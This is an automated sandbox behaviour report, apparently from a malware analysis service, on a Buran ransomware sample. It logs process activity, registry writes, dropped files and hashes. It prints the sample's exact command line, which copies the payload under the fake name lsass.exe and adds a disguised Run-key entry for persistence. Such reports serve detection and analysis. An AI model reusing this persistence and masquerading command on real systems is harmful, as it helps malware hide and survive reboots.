| Get Time | type = Performance Ctr, time = 17773040049 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17783218113 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17783240682 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17793420375 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17793442345 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17814420257 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17814442450 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17835217516 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17835239154 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17845416392 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17845477636 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17855617083 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17855638289 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17865717166 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17865737767 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17875917331 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17875938033 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17896216996 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17896238046 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17914118838 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17914141236 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17926150298 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17926173142 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17936320729 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17936343233 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17946818492 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17946840997 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17971654066 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17971684912 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17981619611 |
|
1 | |
| Get Time | type = Performance Ctr, time = 17981641860 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18002970185 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18002991406 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18013143902 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18013164839 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18024058935 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18024081959 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18034152776 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18034174229 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18044336177 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18044358316 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18103020270 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18103043246 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18103048993 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18103069490 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18135725881 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18135748023 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18146042857 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18146066006 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18166321239 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18166378919 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18176516882 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18176538060 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18186615134 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18186635387 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18196816027 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18196836415 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18217417100 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18217473858 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18228115953 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18228136458 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18238118508 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18238139955 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18248126910 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18248157824 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18258134578 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18258168482 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18278128761 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18278157141 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18288127087 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18288153968 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18298133020 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18298163028 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18308129892 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18308157294 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18328819952 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18328847897 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18339034894 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18339065963 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18349317367 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18349346561 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18359520089 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18359545923 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18380717650 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18380743994 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18390742996 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18390767518 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18401726293 |
|
1 | |
| Get Time | type = Performance Ctr, time = 18401756950 |
|
1 | |
| Get Time | type = System Time, time = 2019-07-04 15:37:31 (UTC) |
|
3 | |
| Get Info | type = Operating System |
|
1 |
Environment (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
2 |
Process #6: cmd.exe
87
0
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\system32\cmd.exe" /e:on /c md "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows" & copy "C:\Users\5P5NRG~1\AppData\Local\Temp\buran.exe" "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe" & reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Local Security Authority Subsystem Service" /t REG_SZ /F /D "\"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe\" *" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:41, Reason: Child Process |
| Unmonitor | End Time: 00:00:42, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xad0 |
| Parent PID | 0x9cc (c:\users\5p5nrg~1\appdata\local\temp\buran.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AD4
|
Dropped Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\5P5NRG~1\AppData\Local\Temp\buran.exe | 156.00 KB |
MD5:
55030a1c4072b1b0b3c33ba32003b8b5
SHA1: dd0c8fb141b27a9bc0f7c3c21646c0ef6b503632 SHA256: 7ddbd9d156f58969e172c3ecc91b230ac1dff4c185fa7db0cf07aa2c4e3ea18f SSDeep: 3072:HEX73H1IPfe7ng9UfmeUS1ZQb/LvmL6A41q6FCCBXnOMkm6Hl9B:kX7m+SUay+AIq6YCoMkd/ |
|
|
Host Behavior
File (34)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\5P5NRG~1\AppData\Local\Temp\buran.exe | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create Directory | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows | - |
|
1 | |
| Get Info | C:\Windows\system32 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32 | type = file_attributes |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\5P5NRG~1\AppData\Local\Temp\buran.exe | type = file_attributes |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe | type = file_attributes |
|
2 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe | type = file_attributes |
|
1 | |
| Get Info | System Paging File | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
8 | |
| Open | STD_INPUT_HANDLE | - |
|
3 | |
| Open | STD_ERROR_HANDLE | - |
|
3 | |
| Open | STD_INPUT_HANDLE | - |
|
2 | |
| Open | - | - |
|
2 | |
| Copy | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe | source_filename = C:\Users\5P5NRG~1\AppData\Local\Temp\buran.exe |
|
1 | |
| Read | STD_INPUT_HANDLE | size = 512, size_out = 512 |
|
1 | |
| Write | STD_ERROR_HANDLE | size = 104 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 27 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\reg.exe | os_pid = 0xae8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Get Info | c:\windows\syswow64\cmd.exe | type = PROCESS_PAGE_PRIORITY |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4a4a0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76c20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x76c4a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76c53b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76c34a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x76c4a79d |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-07-04 15:37:13 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 107765 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16198883248 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #7: reg.exe
41
0
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\windows\syswow64\reg.exe |
| Command Line | reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Local Security Authority Subsystem Service" /t REG_SZ /F /D "\"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe\" *" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:41, Reason: Child Process |
| Unmonitor | End Time: 00:00:42, Reason: Self Terminated |
| Monitor Duration | 00:00:00 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xae8 |
| Parent PID | 0xad0 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AEC
|
Host Behavior
File (5)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 39 |
|
1 |
Registry (4)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | value_name = Local Security Authority Subsystem Service |
|
1 | |
| Write Value | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | value_name = Local Security Authority Subsystem Service, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe" *, size = 156, type = REG_SZ |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\reg.exe | base_address = 0x360000 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-07-04 15:37:13 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 107890 |
|
1 | |
| Get Time | type = Performance Ctr, time = 16222306396 |
|
1 |
Process #8: lsass.exe
1809
4
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\lsass.exe |
| Command Line | "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\lsass.exe" * |
| Initial Working Directory | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ |
| Monitor | Start Time: 00:00:42, Reason: Child Process |
| Unmonitor | End Time: 00:01:05, Reason: Self Terminated |
| Monitor Duration | 00:00:22 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xaf4 |
| Parent PID | 0x9cc (c:\users\5p5nrg~1\appdata\local\temp\buran.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AF8
0x
B18
0x
B1C
0x
B28
0x
B2C
0x
B30
0x
B3C
0x
B48
0x
B4C
0x
B70
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| lsass.exe | 0x00BB0000 | 0x00BE2FFF | Relevant Image | - | 32-bit | - |
|
|
|
Dropped Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\5P5NRG~1\AppData\Local\Temp\AE785005.buran | 1 bytes |
MD5:
93b885adfe0da089cdf634904fd59f71
SHA1: 5ba93c9db0cff93f52b521d7420e43f6eda2784f SHA256: 6e340b9cffb37a989ca544e6bb780a2c78901d3fb33738768511a30617afa01d SSDeep: 3:: |
|
|
Host Behavior
File (3)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\5P5NRG~1\AppData\Local\Temp\5B51C018.buran | desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Write | C:\Users\5P5NRG~1\AppData\Local\Temp\5B51C018.buran | size = 1 |
|
1 | |
| Delete | C:\Users\5P5NRG~1\AppData\Local\Temp\5B51C018.buran | - |
|
1 |
Registry (865)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Buran\Service | - |
|
2 | |
| Create Key | HKEY_CURRENT_USER\Software\Buran | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Borland\Locales | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Borland\Locales | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Borland\Delphi\Locales | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran\Service | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
130 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
6 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
5 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
10 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
149 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
27 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
42 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Buran | - |
|
116 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Knock, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
6 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
5 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
10 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
149 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
27 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
42 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Buran | value_name = Stop, type = REG_NONE |
|
116 | |
| Write Value | HKEY_CURRENT_USER\Software\Buran\Service | value_name = Public Key, data = V/L+XRZkl9zExa+qoOeEkbNDK8rDu+DlL03CJxFRDz0Kt+/sPii6C3FSQOgFlJ85tLJ7pe0EN/V6lZWfTK3Ekovfmz7UbpkuE5mAaGNefyGR+fkowGOQ2NEiLtX8wcr8UWRHhFiahywIkxzugPvfxDEh5MfKhmMRfgzj07Ay3o5p0N4blFNJj2gM5zwT0Ktz7tohHn0VK+3zrY+AcqmyV+W5/OiC02ERW9Xjq+GintxXB+Wt2+oInu/DlY5na8g49dua77uOF6RpaRss8T7FQ117eESTqhSFW/68PPntOjizGewEEeKC/dj2bR0TV+D98ngbhaz4GVmqu6jUemQt+x8K1lcfJvrMEi7HhbAglZY/wPY7bLrnibmgTTajvFlFin33prrPTyxQx8e6oLLpDNkc, size = 409, type = REG_SZ |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Buran\Service | value_name = Machine ID, data = 05B9EUkaPIPnR1j5OPrQtbnRpFTan+HGf+D/AH6BSanSBo6n5XvhlPegiZnPIXGhqvhJGPFvOBX4N05R6qhojtOX+9d1bFZJZOFE2oODRXd+55dVf7MOFpQsWWS495ffu1HjmMgHLJQpnhMMwMqO/mIXCuw1qBz8D3HtXOb5/OMI+6JxaqZd8AhosM/pPYAU3MdMVNXBvoTJDK8uavJMjKNIsQNpka93n4YtkfxPwL2/rMuUu4V2tDeH6on+pMyXw0YTAQfRYVGHx8JpngRbUaGYbMPPTjHXi+oR0+P79b5Zi5IMH3sHnLjifDoiZIMWbWWZFTf/yT1GeiIE+VVHhGuIiErfLast3u8OF9nKlquV/YH041SbW/P+B5QCDGFvgLSEsVj/B+yelAyd03dzELfWbI9yiv0AKCeVHRpWyN3F6jHJXFs/2JM1LVo57qwP+gBLCF87BbuM10BeSGTW+pbUVDDEaUOx5TLAY1YJYoGKPfgUUM13/j/fx9qO1QCiJ+LuT4f0FXB5buJA5mcQ3S1ZWB187kpSpcL1TptQaQLgEEi/pj8Icdq9F95Igw1MuTq4jL7To8bUkM28yK75UlH15E5wLUPrHHGbiZECUHYh989g7Cj942XwkRfLu7Q8XHrZ5hrTrxTTPvWFz1b2vo7ClEmjhkRRZWKBHjQN8HAeKfV3EvJKw9xyUyF1nfuuefuNu9qqolIECdtsYbhHN/kTnG3fZv98U0oKRdG/SZebyuRFxMJv2t3gbEUwExGlBg6TxHqIoWMXP6k53Pi0WTmkf+kVAMuGoAnnXWikBYTKoaT/Ddt7YTtUEfx+aTyrRJ2ovZwxaqYS7zCmz8et5Q1joirtqtkccqcbZjDrc+fXcnMRuP9AiQI1IxJAPco5JjZo6XPAl7Y9qm4NkHEOWniOEAF/FbkHaatonc4atDuIJvMAiJXqzmGrNeHRLhdHoz09xMAWrhnNVT26xKPtpNyPihmiX8KZInO1/Mwz4XThC4PrIvNVvIKKdBfc31Nn2RZ4tR5VSH2sVL9fhjA5sihIIwHK8JSXVj8P9V7urpCHDJcqO+hMyCB6cM1Yz25nCTWfXKmaz6XJbKWTbMC7qj2ggkuWY/Mfs7RLXo8RzHASVsXaBl6Z2hZQ3L9BqlCwNvyfVy15c2u9TXmh1uZjN0+zMocvIBR/mMQMMMK5/aqvhUQ0gCOqRStsNP8OH3+m1O2u+OsYvrEH5iHpxscQN5LMJp2hUAgXX3YsTMEYbm87hSdsgY6jc/G9mks1dHrIAX696FzvP0SLRfmGnlfseEQxLmsLQ4FE678Tu0oqkCht4aLuQKm531Xak8YybHP8VSxPicanhtoYR0AZqB73oDX1TfHjJztEW/O2TfIYqQ0NpT6V/YwFjSzo8VL+hycwEK751HM8v7AUX4aDlRgJsXz6I4tiTYXD5P4EQ5DRAsX46fm8bRQpq/DlShhiWUqcHiO9cMEAtv4SUcBo3l8fJhLWEEGo/hyh1jIPR/Ne598HJWDMhQBL4NjkY/Q1Y+ZfhLsgUY/QoZI0yUea9By5CBAAqyR3Vrqx1Rhb0/clbmH1H0JkTVkppUmxCS+cKifJovYw9JYBNYTyFvqck7hIJ8DHXHohfHM4Q006vUoe180dF5/7ofSEBzVu7OAT1suXINoZYjqiCCEM/c/6LFEwdpxCMbA7u9wr45PM7Tm26o9vBY1Z5X8x37zu1f043o5E1UCuYA==, size = 1737, type = REG_SZ |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Buran | value_name = Knock, data = 666, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Process (17)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cmd.exe | os_pid = 0xb78, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | os_pid = 0xb90, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | os_pid = 0xba8, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | os_pid = 0xbc0, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | os_pid = 0xbd8, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | os_pid = 0xbf0, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | os_pid = 0x41c, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | os_pid = 0x8b4, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | os_pid = 0x274, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | C:\Windows\system32\cmd.exe | os_pid = 0x3c0, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
